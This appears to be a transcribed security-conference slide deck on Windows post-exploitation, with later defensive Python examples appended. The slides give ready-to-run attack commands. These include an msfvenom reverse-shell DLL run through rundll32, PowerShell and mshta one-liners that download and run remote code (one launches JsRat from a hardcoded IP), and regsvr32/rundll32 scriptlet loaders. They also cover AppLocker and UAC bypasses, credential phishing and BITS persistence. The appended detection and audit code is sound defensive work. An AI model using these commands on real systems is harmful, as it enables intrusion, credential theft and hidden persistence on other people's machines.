Attack and Defense in the Post-Exploitation Phase (slide deck)

Uploader: 2127513****773577... Document ID: 242008502 Uploaded: 2024-08-09 Format: PPT Pages: 65 Size: 20.91MB
Shell is Only the Beginning
Attack and Defense in the Post-Exploitation Phase
3gstudent & Evi1cg

"As an offensive researcher, if you can dream it, someone has likely already done it... and that someone isn't the kind of person who speaks at security cons." - Matt Graeber

3gstudent: Good Study, Good Health, Good Attitude
Evi1cg: ThinWhiteHat, Security Researcher

The post-exploitation phase
Penetration testing: take a specific business system as the target, identify the key infrastructure, and look for the information and assets that the client organization values most and tries hardest to protect.
Hacker attack: the process in which the attacker expands the gains of the attack further and hides their own traces as far as possible.

Agenda
Open a window - Open Proxy
Get past the watchdog - Bypass Application Whitelisting
I'll be the master of the house - Escalate Privileges
What's in the room - Gather Information
I'll catch you - Detection and Mitigations
Dig a secret passage - Persistence

Open a window: Open Proxy

Why use a proxy?
To reach the environment the target sits in more effectively.
To use a machine we already have a shell on as a pivot and expand the results.
It's the beginning.

Common methods
Port forwarding: Client - Lcx, Netsh; HTTP - Tunnel; Metasploit - portfwd
Socks proxy: Client - Ew, Xsocks; HTTP - ReGeorg; Metasploit - socks4a
Other: SSH, ICMP, VPN, etc.

! However, we may run into situations like these:
Antivirus software is installed and blocks "malicious" programs.
An application whitelist is configured and programs outside the whitelist are prevented from running, e.g. Windows AppLocker.

Windows AppLocker
Introduction: AppLocker is "Application Control Policies". It controls executable programs, installers and scripts. Once the default rules are enabled, programs and scripts can only be run from the default paths; every other path is blocked.

Get past the watchdog: Bypass Application Whitelisting

Bypass approaches
Hta, Office Macro, Cpl, Chm, Powershell, Rundll32, Regsvr32, Regsvcs, Installutil

1. Hta
More:
    Mshta.exe vbscript:CreateObject(Wscript.Shell).Run(calc.exe,0,true)(window.close)
    Mshta.exe javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObject(WScript.Shell).run(calc.exe,0,true);try h.Send();b=h.ResponseText;eval(b); catch(e) new%20ActiveXObject(WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);

2. Office Macro
MacroRaptor: Detect malicious VBA Macros (Python)
https://bitbucket.org/decalage/oletools/wiki/mraptor

3. Cpl
DLL/CPL: generate Payload.dll:
    msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll
(1) Run the dll directly:
    rundll32 shell32.dll,Control_RunDLL payload.dll
(2) Rename the dll to .cpl and double-click to run it.
(3) An ordinary dll works too: just change the extension.
From: drops.wooyun.org/tips/16042

4. Chm
"Advanced combination tricks for building a 'perfect' bundled backdoor": drops.wooyun.org/tips/14254
"Using system CHM files to implement a covert backdoor: the clever tricks we played back then"

5. Powershell
Command:
    powershell -nop -exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')"
    Get-Content payload.ps1 | iex
    cmd.exe /K

8. Regsvcs
key.snk:
    $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZBp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhBdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkBix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFBD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU/dzrGny5stQtTmLxdhZBOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FBdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIBoWsx4V8aiWx8FPPngEmNz89tBAQ8zBIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9B/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tBLZUefrFnLNiHfVjNi53Yg4='
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
Compile:
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs
Run:
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Regasm.dll
    OR
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe Regasm.dll
// Without administrator privileges, run with /U:
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U Regasm.dll
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Regasm.dll
From: https://gist.github.com/subTee/e1c54e1fdafc15674c9a

9. Installutil
InstallUtil:
Compile:
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:InstallUtil.exe InstallUtil.cs
After compiling, run it with the /U parameter:
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U InstallUtil.exe
From: subt0x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html, drops.wooyun.org/tips/8862

10. Executable directories
Use a PowerShell script to scan the allowed paths for writable locations.
Script download: go.mssec.se/AppLockerBC
From: drops.wooyun.org/tips/11804

11. The most direct way: escalate privileges

I'll be the master of the house: Escalate Privileges

Common privilege-escalation methods
Local privilege-escalation vulnerabilities; service-based privilege escalation; protocol-based privilege escalation; Phishing

Local privilege escalation
A script that works out which vulnerabilities are present from the installed patch (KB) numbers: https://github.com/GDSSecurity/Windows-Exploit-Suggester
Export the victim machine's systeminfo to a file:
    systeminfo > 1.txt
Use the script to determine the vulnerabilities that exist:
    python windows-exploit-suggester.py --database 2016-05-31-mssb.xls --systeminfo /Desktop/1.txt

Problems you may run into
The exploit gets killed (by antivirus)! Rewrite the exploit in PowerShell:
evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html

Demo Time
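The local privilege-escalation slide feeds a systeminfo export to Windows-Exploit-Suggester. The same export is what a defender audits from the other direction: which hotfixes from the patch baseline are absent from the host. As an added example that is not from the slides or the Windows-Exploit-Suggester project, the Python below extracts the OS fields and the installed KB numbers from a constructed systeminfo dump and reports the baseline hotfixes that are missing. The sample output and the baseline KB list are constructed for illustration, not taken from a real host or a real advisory set.

```python
import re

# Constructed sample of `systeminfo` output (not captured from a real host);
# only the fields this audit reads are included.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WORKSTATION01
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2533552
                           [02]: KB3140410
                           [03]: KB3146706
"""

# Constructed baseline: the hotfixes a patch-management policy expects on this
# OS build. Illustrative KB numbers for the audit logic, not a real advisory list.
REQUIRED_HOTFIXES = {"KB2533552", "KB3140410", "KB3146706", "KB3153199"}

HOTFIX_RE = re.compile(r"\bKB\d{6,7}\b")
FIELD_RE = re.compile(r"^(OS Name|OS Version|System Type):\s*(.+?)\s*$", re.MULTILINE)


def parse_systeminfo(text):
    """Return (fields, hotfixes): the selected header fields and the set of KB ids."""
    fields = {m.group(1): m.group(2) for m in FIELD_RE.finditer(text)}
    hotfixes = set(HOTFIX_RE.findall(text))
    return fields, hotfixes


def missing_hotfixes(text, required=REQUIRED_HOTFIXES):
    """Hotfixes in `required` that the systeminfo dump does not list, sorted."""
    _, installed = parse_systeminfo(text)
    return sorted(required - installed)


def audit_report(text, required=REQUIRED_HOTFIXES):
    """Human-readable summary: OS build, hotfix count and baseline gaps."""
    fields, installed = parse_systeminfo(text)
    missing = missing_hotfixes(text, required)
    return "\n".join([
        f"{fields.get('OS Name', '?')} ({fields.get('OS Version', '?')}, "
        f"{fields.get('System Type', '?')})",
        f"installed hotfixes: {len(installed)}",
        f"missing from baseline: {', '.join(missing) if missing else 'none'}",
    ])


if __name__ == "__main__":
    print(audit_report(SAMPLE_SYSTEMINFO))
```

The KB regex deliberately reads every `KBnnnnnnn` token in the dump rather than only the numbered `[nn]:` lines, so it still works when systeminfo has been run under a non-English locale where the "Hotfix(s)" label differs.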
Service-based privilege escalation
Common services: Mssql, Mysql, Oracle, Ftp
Third-party services: DLL hijacking, file hijacking
Privilege-escalation script PowerUp: drops.wooyun.org/tips/11989

Protocol-based privilege escalation
Exploit a known issue in Windows to obtain local privilege escalation - Potato. It escalates through NTLM relay (specifically HTTP-to-SMB relay) and NBNS spoofing.
Details: tools.pwn.ren/2016/01/17/potato-windows.html

Phishing
MSF Ask module: exploit/windows/local/ask
It uses runas to lure the user into clicking through the UAC prompt, which yields the highest privileges.
The MSF script that needs modifying: metasploit/lib/msf/core/post/windows/runas.rb

Phishing Demo

What's in the room: Gather Information

Gather Information
Now that we are the master of the house, perhaps we should look at what is in the room. Two cases:
1: Privileges already escalated; we hold the highest privileges and can do whatever we want.
2: Not escalated; the user is still protected by UAC and we cannot do everything yet.

Bypass UAC
Common methods:
Use the IFileOperation COM interface
Use the extract option of Wusa.exe
Remotely inject shellcode into a puppet process
DLL hijacking: hijack a system DLL file
Escalate privileges directly to get past UAC
Phishing
evi1cg.me/archives/Powershell_Bypass_UAC.html

With privileges, what do we do?
Collect mstsc records, browser history, recently used files, local passwords, and so on
Keylogging
Screen recording
Netripper

GetPass Tips
Pop up an authentication window from a script so that the user types in their account and password, which yields the user's plaintext password.
The PowerShell script is as follows:
From:

GetPass Tips
MSF module: post/windows/gather/phish_windows_credentials

More references
Installed Programs, Startup Items, Installed Services, File/Printer Shares, Database Servers, Certificate Authority, Security Services, Sensitive Data, Key-logging, Screen capture, Network traffic capture, User Information, System Configuration, Password Policy, Security Policies, Configured Wireless Networks and Keys

New attack methods: fileless

Fileless technique (1) - Powershell
Screen monitoring:
    powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('evi1cg.me/powershell/Show-TargetScreen.ps1'); Show-TargetScreen"
Audio recording:
    powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(

Fileless technique (2) - js
JsRat: rundll32.ex
Backdoor: drops.wooyun.org/tips/11764
JavaScript Phishing: drops.wooyun.org/tips/12386

Fileless technique (3) - mshta
Launch JsRat:
    Mshta javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObject(WinHttp.WinHttpRequest.5.1);h.Open(GET,192.168.2.101:9998/connect,false);try h.Send();b=h.ResponseText;eval(b); catch(e) new%20ActiveXObject(WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);

Fileless technique (4) - sct
SCT (Calc.sct):
    regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll
From: "Use SCT to Bypass Application Whitelisting Protection", drops.wooyun.org/tips/15124

Fileless technique (5) - wsc
Wsc (Calc.wsc):
    rundll32.exe javascript:.mshtml,RunHTMLApplication ;document.write();GetObject(script:urlto/calc.wsc)
From: "WSC, JSRAT and WMI Backdoor", drops.wooyun.org/tips/15575

Demo Time

Dig a secret passage: Persistence

Common methods
Startup items, registry, wmi, at, schtasks, leveraging existing third-party services

New method
Bitsadmin:
Requires administrator privileges
Can start at boot and at set intervals
Applies to Win7, Win8, Server 2008 and later
Evades Autoruns' detection of startup items
Submitted to MSRC (Microsoft Security Response Center)

Demo Time

I'll catch you: Detection and Mitigations

Detection and Mitigations
    bitsadmin /list /allusers /verbose
Stop the Background Intelligent Transfer Service

Follow drops

Special thanks to Casey Smith (subTee)

Reference
1. "Shell is Only the Beginning": quote from Carlos Perez's blog

Q&A
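Every whitelisting bypass and fileless launcher on the slides goes through a signed Windows binary (mshta, rundll32, regsvr32, regsvcs/regasm, installutil, powershell) with a telltale command line, which is exactly what process-creation logging (Sysmon event 1 or Windows security event 4688 with command-line auditing) records. As an added example that is not part of the talk, the Python below runs a small rule set over constructed process-creation records and reports which rules each record trips. The records, the example.invalid hosts and the user paths are made up for the example; the rules are mine, written from the command lines shown on the slides, not from any vendor's detection content.

```python
import re

# Constructed process-creation records (image path + command line), shaped like the
# fields a Sysmon event 1 or Windows 4688 record carries. None is a real capture; the
# example.invalid hosts and user paths are placeholders.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)'},
    {"id": 2, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32.exe /u /s /i:http://example.invalid/calc.sct scrobj.dll"},
    {"id": 3, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";GetObject("script:http://example.invalid/calc.wsc")'},
    {"id": 4, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "cmd": r"regsvcs.exe /U C:\Users\alice\AppData\Local\Temp\Regasm.dll"},
    {"id": 5, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "cmd": r"InstallUtil.exe /U C:\Users\alice\Downloads\InstallUtil.exe"},
    {"id": 6, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"'''},
    {"id": 7, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\alice\Downloads\payload.dll"},
    # Benign look-alikes the rules must leave alone.
    {"id": 8, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"},
    {"id": 9, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl"},
    {"id": 10, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
]

# (rule name, regex on the image path, regex on the command line). The image regex is
# applied case-insensitively; the command-line regexes carry their own (?i) flag.
RULES = [
    ("mshta inline script", r"\\mshta\.exe$", r"(?i)\b(javascript|vbscript):"),
    ("rundll32 inline javascript", r"\\rundll32\.exe$", r"(?i)\bjavascript:"),
    ("regsvr32 scriptlet load", r"\\regsvr32\.exe$", r"(?i)/i:\s*https?:|scrobj\.dll"),
    ("regsvcs/regasm /U on non-system assembly", r"\\reg(svcs|asm)\.exe$",
     r"(?i)\s/u\s+(?!c:\\windows\\)\S+\.dll"),
    ("installutil /U", r"\\installutil\.exe$", r"(?i)\s/u\b"),
    ("powershell bypass + remote script", r"\\powershell\.exe$",
     r"(?i)-(exec|ep|executionpolicy)\s+bypass.*downloadstring|downloadstring.*-(exec|ep|executionpolicy)\s+bypass"),
    ("control panel item outside %windir%", r"\\rundll32\.exe$",
     r"(?i)control_rundll\s+(?!c:\\windows\\)\S+"),
]


def match_rules(event, rules=RULES):
    """Names of the rules whose image and command-line patterns both match the event."""
    return [name for name, image_re, cmd_re in rules
            if re.search(image_re, event["image"], re.I) and re.search(cmd_re, event["cmd"])]


def scan(events, rules=RULES):
    """Map event id -> rule names for every event that trips at least one rule."""
    flagged = {}
    for event in events:
        hits = match_rules(event, rules)
        if hits:
            flagged[event["id"]] = hits
    return flagged


if __name__ == "__main__":
    for event_id, hits in scan(EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
```

The two rules that key on a path outside `C:\Windows\` (the regsvcs/regasm and Control_RunDLL ones) are what keep the benign records 9 and 10 quiet: the slides' trick is precisely that a signed system binary is handed an attacker-controlled file, so the argument's location, not the binary, is the signal.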
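The Detection and Mitigations slide gives `bitsadmin /list /allusers /verbose` as the check for the Bitsadmin persistence and stopping the BITS service as the mitigation. As an added example that is not from the slides, the Python below parses that verbose listing and flags jobs that look like the persistence described: a job that runs a command when its transfer finishes (assumed here to be the property the technique relies on, since the slide does not spell out the mechanism), a cleartext download source, or a destination in a user-writable directory. The sample listing is constructed, and the field labels it assumes (`DISPLAY:`, `OWNER:`, `STATE:`, `JOB FILES:`, `NOTIFICATION COMMAND LINE:`) follow the verbose output as I recall it; compare the regexes against the listing on your own host before relying on them.

```python
import re

# Constructed sample of `bitsadmin /list /allusers /verbose` output with two jobs.
# Not captured from a real host; the field layout is an assumption about the verbose
# listing, and the hosts, paths and GUIDs are placeholders.
SAMPLE_BITSADMIN = """\
GUID: {1A2B3C4D-0000-0000-0000-000000000001} DISPLAY: 'ContentDownload'
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: NT AUTHORITY\\SYSTEM
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 4096 / 4096
NOTIFY INTERFACE: REGISTERED NOTIFICATION FLAGS: 3
JOB FILES:
        4096 / 4096 WORKING https://updates.example.invalid/pkg.cab -> C:\\Windows\\SoftwareDistribution\\Download\\pkg.cab
NOTIFICATION COMMAND LINE: none

GUID: {1A2B3C4D-0000-0000-0000-000000000002} DISPLAY: 'svchost'
TYPE: DOWNLOAD STATE: QUEUED OWNER: WORKSTATION01\\alice
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 0 / 512
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 3
JOB FILES:
        0 / 512 WORKING http://cdn.example.invalid/u.txt -> C:\\Users\\alice\\AppData\\Local\\Temp\\u.txt
NOTIFICATION COMMAND LINE: cmd.exe /c C:\\Users\\alice\\AppData\\Local\\Temp\\run.bat

Listed 2 job(s).
"""

JOB_SPLIT_RE = re.compile(r"^GUID:\s*", re.M)
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]+\}")
FILE_RE = re.compile(r"(\S+)\s+->\s+(.+?)\s*$", re.M)      # "<url> -> <local path>" lines
USER_WRITABLE_RE = re.compile(r"\\(temp|appdata|programdata|public)\\", re.I)


def _field(pattern, chunk):
    """First capture group of `pattern` within one job's text, or '' if absent."""
    m = re.search(pattern, chunk, re.M)
    return m.group(1).strip() if m else ""


def parse_bits_jobs(text):
    """Split a verbose bitsadmin listing into one dict per job."""
    jobs = []
    for chunk in JOB_SPLIT_RE.split(text)[1:]:
        jobs.append({
            "guid": GUID_RE.match(chunk).group(0),
            "display": _field(r"DISPLAY:\s*'([^']*)'", chunk),
            "state": _field(r"STATE:\s*(\w+)", chunk),
            "owner": _field(r"OWNER:\s*(.+?)\s*$", chunk),
            "notify_cmdline": _field(r"NOTIFICATION COMMAND LINE:\s*(.*?)\s*$", chunk),
            "files": FILE_RE.findall(chunk),
        })
    return jobs


def audit_bits_jobs(jobs):
    """guid -> list of findings for jobs showing the traits the persistence relies on."""
    findings = {}
    for job in jobs:
        notes = []
        if job["notify_cmdline"].lower() not in ("", "none"):
            notes.append("runs a command when the transfer finishes: " + job["notify_cmdline"])
        for url, dest in job["files"]:
            if not url.lower().startswith("https://"):
                notes.append("cleartext download source: " + url)
            if USER_WRITABLE_RE.search(dest):
                notes.append("writes into a user-writable location: " + dest)
        if notes:
            findings[job["guid"]] = notes
    return findings


if __name__ == "__main__":
    for guid, notes in audit_bits_jobs(parse_bits_jobs(SAMPLE_BITSADMIN)).items():
        print(guid)
        for note in notes:
            print("  -", note)
```

Stopping the BITS service, as the slide suggests, removes the channel wholesale; once a specific job has been reviewed it can instead be removed on its own with `bitsadmin /cancel {GUID}`, which leaves legitimate transfers such as update downloads running.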